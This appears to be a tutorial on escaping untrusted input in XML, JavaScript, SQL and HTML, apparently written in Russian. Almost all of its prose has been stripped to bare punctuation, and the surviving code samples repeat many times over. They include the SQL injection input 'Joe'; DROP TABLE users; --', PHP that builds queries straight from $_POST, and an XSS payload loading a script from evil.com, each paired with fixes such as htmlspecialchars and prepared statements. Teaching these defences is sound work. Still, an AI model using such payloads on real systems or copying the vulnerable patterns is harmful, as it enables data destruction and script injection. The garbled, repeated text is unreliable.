Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens";
var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens";
var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens";
var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens";
var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?
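The three escaping rules discussed above (XML entities, the backslash in JavaScript string literals, and the MySQL-style quoting shown with mysql_real_escape_string earlier), as an added example that is not part of the original article. It shows why the escape character of each context must be handled first, and parses the escaped XML back to confirm the consumer recovers the original text; the function names are this example's own.

```python
"""
Context-specific escaping for the article's three contexts: text between
XML/HTML tags, a double-quoted JavaScript literal, and a single-quoted
MySQL literal. In each context the escape character itself must be escaped,
and it must be handled before the other replacements, or output produced by
a later step would be escaped a second time.
"""
import xml.etree.ElementTree as ET


def escape_xml_text(text: str) -> str:
    """Escape text for use between XML/HTML tags. '&' goes first."""
    return (text.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;"))


def escape_xml_text_wrong_order(text: str) -> str:
    """Same replacements with '&' handled last: a counter-example that
    turns '<' into '&amp;lt;', which a parser renders as the literal '&lt;'."""
    return (text.replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace("&", "&amp;"))


def escape_js_string(text: str) -> str:
    """Escape text for a double-quoted JavaScript string literal.
    The backslash goes first, then the quote that would end the literal."""
    return text.replace("\\", "\\\\").replace('"', '\\"')


def escape_mysql_literal(text: str) -> str:
    """Backslash-style escaping of a single-quoted MySQL literal, limited to
    the two characters the article's examples exercise (the real
    mysql_real_escape_string also handles NUL, \\n, \\r, \\x1a and \")."""
    return text.replace("\\", "\\\\").replace("'", "\\'")


def article_xml(author: str, contents: str) -> str:
    """Build the article's <article> document from untrusted text."""
    return ("<article><author>%s</author><contents>%s</contents></article>"
            % (escape_xml_text(author), escape_xml_text(contents)))


def parse_article(doc: str) -> tuple:
    """Read the author and contents back with a real XML parser: the parser
    follows the same rules, so the original text comes back unchanged."""
    root = ET.fromstring(doc)
    return root.findtext("author"), root.findtext("contents")
```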



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'";
$result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name'];
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post">
    <p class="meta">Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?></p>
    <p class="body">
        <?php echo $post['body']; ?>
    </p>
</div>

, , :

<div class="post">
    <p class="meta">Posted by Plato on January 2, 15:31</p>
    <p class="body">
        I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat."
    </p>
</div>

, , , , :

<div class="post">
    <p class="meta">Posted by Pascal on November 23, 04:12</p>
    <p class="body">
        Basic math tells us that if x < n and y > n, x cannot be larger than y.
    </p>
</div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
